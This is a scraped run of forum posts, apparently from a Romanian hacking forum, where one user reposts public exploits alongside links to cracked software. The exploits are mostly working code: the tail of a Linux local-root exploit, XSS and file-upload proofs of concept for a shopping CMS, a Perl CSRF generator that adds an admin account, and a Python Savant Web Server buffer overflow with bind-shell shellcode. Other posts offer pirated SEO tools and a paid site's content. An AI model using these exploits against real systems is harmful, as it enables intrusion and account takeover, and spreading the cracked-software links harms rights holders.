su with shellcode.\n"); execl("/bin/su", "su", shellcode, NULL); } else { char pid[32]; sprintf(pid, "%d", parent_pid); printf("[+] Executing child from child fork.\n"); execl("/proc/self/exe", argv[0], "-c", pid, NULL); } } Sursa: Mempodipper - Linux Local Root for >=2.6.39, 32-bit and 64-bit
  15. The_Arhitect
    Parsp Shopping CMS [V5] Multiple Vulnerability # Exploit Title: Parsp Shopping CMS [V5] Multiple Vulnerability # Date: 2012-01-22 [GMT +7] # Author: BHG Security Center # Software Link: http://www.parsp.com/ # Vendor Response(s): They didn't respond to the emails. # Dork: intext:"powered by www.parsp.com V5" # Version : [5] # Tested on: ubuntu 11.04 # CVE : - # Finder(s): - Net.Edit0r (Net.edit0r [at] att [dot] net) - NoL1m1t (nol1m1t [at] rocketmail [dot] com) ----------------------------------------------------------------------------------------- Parsp Shopping CMS [V4] Multiple Vulnerability ----------------------------------------------------------------------------------------- Author : BHG Security Center Date : 2012-01-22 Location : Iran Web : http://Black-Hg.Org Critical Lvl : Medium Where : From Remote My Group : Black Hat Group #BHG --------------------------------------------------------------------------- PoC/Exploit: ~~~~~~~~~~ ------------- ( WYSIWYG Editor ) ~ ~ [PoC]Http://[victim]/path/wysiwyg/editor/filemanager/browser/default/browser.html?Type=File&Connector=connectors/php/connector.php Allowed formats for uploading ~ $Config['AllowedExtensions']['File'] = array( "zip", "rar", "pdf", "doc", "xls", "csv" ); $Config['AllowedExtensions']['Image'] = array( "jpg", "gif", "jpeg", "png" ); $Config['AllowedExtensions']['Flash'] = array( "swf", "fla" ); $Config['AllowedExtensions']['Media'] = array( "swf", "fla", "jpg", "gif", "jpeg", "png", "avi", "mpg", "mpeg" ); Unauthorized extension $Config['DeniedExtensions']['File'] = array( "html", "htm", "php", "php2", "php3", "php4", "php5", "phtml", "pwml", "inc", "asp", "aspx", "ascx", "jsp", "cfm", "cfc", "pl", "bat", "exe", "com", "dll", "vbs", "js", "reg", "cgi", "htaccess", "asis", "sh", "shtml", "shtm", "phtm" ); ------------- ( Cross Site Scripting ) ~ ~ [PoC] ~: Http://[victim]/path/index.php?advanced_search_in_category=[XSS]&categoryID=13&search=1&search_in_subcategory=1&search_name=&search_price_from=&search_price_to= Note: URL encoded GET input advanced_search_in_category was set to ' onmouseover=prompt(923419) bad=' -------------( Error message on page For Find Directory Address ) ~ ~ [PoC]Http://[victim]/path/printable.php Note:User and account information on the site intended for attacks burteforce -------------( PHPinfo page Information ) ~ ~ [PoC]Http://[victim]/path/phpinfo.php Note:Full information about the Php installed on the server Timeline: ~~~~~~~~~ - 21 - 01 - 2012 bug found. - 21 - 01 - 2012 vendor contacted, but no response. - 22 - 01 - 2012 Advisories release. Important Notes: ~~~~~~~~~ - Vendor did not respond to the email as well as the phone. As there is not any contact form or email address in - the website, we have used all the emails which had been found by searching in Google such as support, info, and so on. --------------------------------------------------------------------------- Greetz To:A.Cr0x | 3H34N | tHe.k!ll3r | ArYaIeIrAN | NoL1m1t | G3n3Rall Spical Th4nks: B3hz4d | Mr.XHat | _SENATOR_ | Cyber C0der And All My Friendz [!] Persian Gulf 4 Ever [!] I Love Iran And All Iranian People Greetz To : 1337day.com ~ exploit-db.com [h4ckcity tM] And All Iranian HackerZ -------------------------------- [ EOF ] ---------------------------------- Sursa: Parsp Shopping CMS [V5] Multiple Vulnerability
  16. The_Arhitect
    Salespage: SEnuke X SEO Software - The World's First Money Making Machine Senukex is one of the most advanced link building tools ever developed in the internet marketing field. It is the version 2 of the hugely popular senuke tool. It is developed by Areeb Bajwa and Joe Russel. Senuke helps You to create web2.0 accounts, create forum profiles, create bookmarking accounts and bookmark urls, do keyword research and more. Let's see everything in detail very soon in this senukex review. Ready fully to have a through understanding of senukex. Download: http://www.multiupload.com/I5KXT9WM0U Mirror: http://www.mirrorcreator.com/files/01F0ZXUO/SenukeX-242.rar_links Virus Scan: https://www.virustotal.com/file/721ce331ce390ec5c16a28579207259e0c8e39f405bdf4dacf4b61b50514dde2/analysis/
  17. The_Arhitect
    Interesant chiar nu stiam asta
  18. The_Arhitect
    Ti-am dat PM.
  19. The_Arhitect
    Nici nu mai zic nimic!
  20. The_Arhitect
    http://www.youtube.com/watch?feature=player_embedded&v=IlEa_MMP3KM
  21. The_Arhitect
    The membership only site: Crackit.info - FREE Crack Downloads | Best SEO & Internet Marketing Tools The site charges $67 to download all it's content. All products included [updated 12/1/2012] Download [978 MB] D6fxqOzdy0pR3=3=nrSFwoldDmlbw0LKEoxR+dQS+4kbJQ55 (crypted once) If you want this product download it ASAP as the links are taken down pretty quickly.
  22. The_Arhitect
    iSupport v1.x CSRF HTML Code Injection to Add Admin #!/usr/bin/perl ######################################################################## # Title : iSupport v1.x => Html Code injection to add admin # Author : Or4nG.M4n # Version : 1.x # Homepage : http://www.idevspot.com/iSupport.php # Google Dork: "Powered by [ iSupport 1.8 ]" # Homepage : http://www.idevspot.com/ # Thnks : # +----------------------------------+ # | xSs m4n i-Hmx h311 c0d3 | # | Dr.Bnned ahwak2000 sa^Dev!L | # +----------------------------------+ # html injection to add Admin # vuln : pending_testimonials.php # # <tr bgcolor="#F9F9F9"> # <td width="100%"> <b> # <?php echo $title;?> # </b> <i>posted by</i> <b> # <?php echo $name;?> # </b> [ <a href="<?php echo $website; ?>" target="_blank"><b>Website</b></a> ] <br> # <i> # <?php echo $body; ?> # </i></td> # <td> # How i can Fixed .. # in all vuln file # Replace : echo $website; echo $title; echo $body; => Replace with => echo htmlspecialchars($website); like this .. # Thnks to All Stupid Coders system("cls"); print " +----------------------------------------+\n | iSupport 1.x inject html to Add Admin |\n | Or4nG.M4n sA^Dev!L xSs m4n i-Hmx |\n +----------------------------------------+\n Loading ...\n "; sleep(3); print "tragt & path #"; $h = <STDIN>; chomp $h; print "User #"; $user = <STDIN>; chomp $user; print "Mail #"; $mail = <STDIN>; chomp $mail; print "Pass #"; $pass = <STDIN>; chomp $pass; $html = '<form name="xss" method="post" action= "'.$h.'/admin/function.php?which=ADMINISTRATORS&return=administrators&id=&t1=NAME&t2=EMAIL&t3=PASSWORD"> <input type="text" name="1" value="'.$user.'" size="30"> <input type="text" name="2" value="'.$mail.'" size="30"> <input type="text" name="3" value="'.$pass.'" size="30"> <script>document.xss.submit();</script> </form>'; sleep(2); print "Createing ...\n"; open(XSS , '>>csrf.htm'); print XSS $html; close(XSS); print "Createing Done .. \n"; sleep(2); print "Plz UPLOAD csrf.htm to your Site and Put's Url h3r3 #"; $csrf = <STDIN>; chomp $csrf; $done = '<iframe id="iframe" src="'.$csrf.'" width="777" height="678"></iframe>'; sleep(2); print "NOW INJECT This Code \n"; print $done."\n"; print ""; print "\n Enjoy .. "; # The End Sursa: iSupport v1.x CSRF HTML Code Injection to Add Admin
  23. The_Arhitect
    Nova CMS Directory Traversal # # Title : Nova CMS Directory Travel # Author : Red Security TEAM # Date : 21/01/2012 # Download : http://www.nova-cms.com/uploads/files/novacms.zip # Tested On : CentOS # Dork : Copyright ©2005-2011 by Nova CMS. # Contact : Info [ 4t ] RedSecurity [ d0t ] COM # Home : http://RedSecurity.COM # # Exploit : # # 1. Register # 2. Go to forum and click on "NEW TOPIC" # 3. In the above tab in editor click on last picture "Attach File" # 4. Start Live HTTP headers # 5. Add a new allowed file # 6. Find dir=uploads%2Fforum%2Fdata-YourUsername2F&options=true&ajax=true and click on Reply on Live HTTP headers # 7. Change to dir=uploads%2F , dir=uploads%2Fbackup%2F # 8. You can't back to directory before uploads directory but you can see all directory in uploads example another users files and uploads/backup/ # Sursa: Nova CMS Directory Traversal
  24. The_Arhitect
    Savant Web Server 3.1 Buffer Overflow Exploit (Egghunter) #!/usr/bin/python import socket target_address="10.10.10.129" target_port=80 buffer2 = "R0cX" + "R0cX" # msfpayload windows/shell_bind_tcp LPORT=4444 R | msfencode -e x86/shikata_ga_nai -c 4 -t c buffer2 += ("\xbd\xec\x37\x93\x4b\xdb\xcf\xd9\x74\x24\xf4\x58\x31\xc9\xb1" "\x6a\x83\xc0\x04\x31\x68\x10\x03\x68\x10\x0e\xc2\x4a\xa1\x17" "\x59\x49\xc2\xff\x91\x58\x90\x5d\x29\xec\xb0\x10\xb1\x92\xd3" "\xae\x07\xc5\x35\x4d\x38\xf3\xdb\x06\xfc\xec\x5f\xa5\x66\x93" "\xcc\x5d\x07\x81\xcb\xcc\x59\x35\x45\xd6\x2d\x15\xa1\xe7\xbb" "\xd6\x5d\x68\x57\x1b\x2a\x4f\xe8\xdd\xd3\xc0\x84\x0c\x0e\xb7" "\x03\x24\xc7\xfd\xd2\xa5\x88\x89\xf8\x07\x82\x1b\xcb\x2d\x3b" "\xfd\x9d\x67\xa9\xff\xe9\x20\x9e\xa9\x25\x8b\x7c\xda\xd9\x01" "\x32\x51\x36\x9a\xe7\x73\x8f\xe5\xea\x60\xa6\x4c\x78\xef\xbb" "\x1e\x37\xd0\xbd\xaa\x4f\xe7\x94\x3e\x02\x34\x21\xc6\xc1\xe2" "\xa3\x6f\x76\x92\x9a\xed\xda\x19\x2d\xca\x21\xb2\xb0\xa9\xb5" "\x72\xa1\xbb\xd0\x18\x64\xd3\xb4\x85\x0c\x92\xf7\x07\xcf\x13" "\xc2\x95\x57\x0a\x68\x6d\x94\x6f\x5a\xad\xd1\x82\x26\x9f\x3c" "\x0d\x2b\xdc\x06\x6a\xd3\x87\x24\x9c\x14\x58\x71\x42\xef\x1b" "\x90\xdc\x46\x67\x51\xd3\x4c\xc4\x11\x23\x29\xbd\xc5\xab\x96" "\x54\x5e\xb6\x08\x60\x42\x5f\x7a\x76\xdf\x30\x05\x76\xb7\xd1" "\xf2\x49\xba\x14\x69\xa7\x7b\xa8\x6b\xb9\xad\xc8\x8e\x0f\x9e" "\x07\x7f\xa7\x89\x9b\x4d\x68\xbd\x45\x77\xe0\x64\xec\xa2\x18" "\x2d\x6f\x10\xc3\x14\x1d\x4e\x92\x3a\x8a\xf0\xd8\x07\x12\x19" "\x27\x0c\x23\xe4\x0b\xbb\x6d\x97\xf8\xe8\x8c\x23\xb5\xe0\x22" "\xe8\x70\x85\x10\xbb\x64\xbe\x09\x41\xe7\x2d\x6d\x39\xfb\xcc" "\x09\xee\xca\x8f\x83\x22\x5d\x77\x2b\x5b\xc6\x1b\x82\x6e\x17" "\x03\xe8\x6c\x35\x55\x71\xd4\x35\x72\x12\x3f\x11\x6e\xcf\x09" "\x5a\xd0\x33\x40\x8e\x3f\x36\xbf\xd7\xd0\x85\x17\x03\xd3\xc4" "\x7f\x17\x6e\xe8\x0d\xa6\x5f\x9e\xd6\x1b\xf4\x2b\x8c\xb3\xad" "\x19\xb3\x70\xac\x56\x76\x0c\xfb\x4f\xc4\x99\xdd\x99\x75\x8f" "\xa8\xfa\x91\x5c\xfb\x26\xbd\x8a\xea\xec\x0d\xf1\x45\x4f\x72" "\xd1\x02\x47\x9c\xa5\x33\x1e\xf8\xc7\x00\xd2\x3d\x86\xb4\x7c" "\xb9\x85\x5f\x8c\x40\x58\x7e\x7c\x5d\x76\x3a\xd6\x0b\x9e\xfe" "\x88\xc7\x60\x56\x99\x19\x7f\x7a\xda\x93\x72\x99\x3f\x69") badbuffer = "\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74\xef\xb8\x52\x30\x63\x58\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7" # egghunter searching for R0cX badbuffer += "\x90" * (254 - len(badbuffer)) badbuffer += "\x09\x1D\x40" # EIP Overwrite 00401D09 savant.exe POP EBP, RETN httpmethod = "\xb0\x03\x04\x01\x7B\x14" # MOV AL, 3; ADD AL, 1; JPO 14 sendbuf = httpmethod + " /%" + badbuffer + '\r\n\r\n' + buffer2 sock=socket.socket(socket.AF_INET, socket.SOCK_STREAM) connect=sock.connect((target_address,target_port)) sock.send(sendbuf) sock.close() Sursa: Savant Web Server 3.1 Buffer Overflow Exploit (Egghunter)
  25. The_Arhitect
    php ireport v1.0 Remote Html Code injection #!/usr/bin/perl ######################################################################## # Title = phpireport v1.0 => Remote Html Code injection # Author = Or4nG.M4n # Download = http://garr.dl.sourceforge.net/project/phpireport/phpireport%20v1.0%20alpha%20revision%2025.rar # Thnks : # +----------------------------------+ # | xSs m4n i-Hmx h311 c0d3 | # | Dr.Bnned ahwak2000 sa^Dev!L | # +----------------------------------+ # # Html injection # vuln : messages_viewer.php # vuln : home.php # vuln : history.php # code : # # echo " # <li> # <div class='post-details'><div style='float:left'>user: ".stripslashes($name)."</div> <div style='float:right'>".$time."</div></div> # <br> # <div class='post-details'>".stripslashes($message)."</div> # </li> # "; # How i can Fixed .. # in all vuln file # Replace : stripslashes => Replace with => htmlspecialchars # Thnks to All Stupid Coders # use LWP::UserAgent; print "Code to inject #"; my $inj = <STDIN>; chomp $inj; my $url = 'http://localhost/phpireport/index.php'; my $ua = LWP::UserAgent->new(); my $response = $ua->post( $url, { 'message' => $inj } ); # Post <textarea rows='2' name='message' id='name'></textarea> my $content = $response->decoded_content(); print "\n done \n"; # The End Sursa: php ireport v1.0 Remote Html Code injection
×
×
  • Create New...